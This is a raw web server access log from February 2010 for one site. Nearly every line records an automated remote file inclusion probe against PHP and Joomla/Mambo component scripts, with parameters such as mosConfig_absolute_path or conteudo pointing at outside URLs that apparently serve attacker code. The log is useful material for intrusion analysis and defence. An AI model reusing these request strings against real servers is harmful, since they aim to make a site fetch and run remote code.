80.97.64.32 - - [13/Feb/2010:08:29:02 -0800] "GET /logs//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:29:51 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:29:51 -0800] "GET /logs/access_100205.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:29:51 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:29:56 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:30:30 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:30:31 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:30:32 -0800] "GET /logs/access_100201.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:30:33 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:31:09 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:31:09 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:31:09 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:31:34 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:31:34 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:31:35 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:31:45 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:31:48 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:32:09 -0800] "GET /logs/access_100126.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:32:46 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:32:55 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:33:06 -0800] "GET /logs/access_100118.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:33:06 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:33:07 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:33:18 -0800] "GET /logs/access_100127.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:33:22 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:08:33:27 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:33:38 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:33:44 -0800] "GET /logs/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:33:45 -0800] "GET /index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:33:49 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:34:29 -0800] "GET /logs/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:34:29 -0800] "GET /index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:06 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:06 -0800] "GET /logs/access_100112.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:06 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:35 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:35 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:35:35 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:35:37 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:35:37 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:35:42 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:35:46 -0800] "GET /logs//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:35:46 -0800] "GET /logs/access_100112.log//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:35:46 -0800] "GET /administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:35:49 -0800] "GET /include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:35:51 -0800] "GET /logs//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:35:51 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:02 -0800] "GET /logs/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:02 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:36:02 -0800] "GET /logs/access_100104.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:02 -0800] "GET /index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:09 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:09 -0800] "GET /logs/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:36:10 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:36:10 -0800] "GET /logs/access_100112.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:36:10 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:36:11 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:36:14 -0800] "GET /index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:36:16 -0800] "GET /logs/access_100115.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:36:20 -0800] "GET /logs/access_100113.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:36:20 -0800] "GET /logs/access_100112.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:36:34 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:36:34 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:36:34 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:36:35 -0800] "GET /logs/access_100112.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:36:45 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:36:45 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:36:45 -0800] "GET /logs/access_091231.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:36:53 -0800] "GET /logs/access_100126.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:36:53 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:36:53 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:37:16 -0800] "GET /logs/access_100111.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:19 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:19 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:19 -0800] "GET /logs/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:08:37:47 -0800] "GET /logs/access_100126.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:55 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:55 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:37:55 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:38:34 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:38:41 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:38:42 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:38:49 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:39:10 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:39:10 -0800] "GET /logs/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:39:10 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:39:27 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:39:27 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:39:27 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:39:31 -0800] "GET /logs/access_100127.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:39:31 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:39:31 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:39:45 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:39:59 -0800] "GET /logs/access_100112.log%20%20//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:40:01 -0800] "GET /galeria.php?start=0&kategoria=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:40:01 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:40:01 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:40:05 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:40:14 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:28 -0800] "GET /logs/access_100123.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:40:32 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:40:32 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:40:32 -0800] "GET /logs/access_100126.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:40:34 -0800] "GET /logs/access_100208.log%20//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:37 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:37 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:37 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:40:38 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:40:38 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:39 -0800] "GET /logs/access_100123.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:39 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:40:39 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
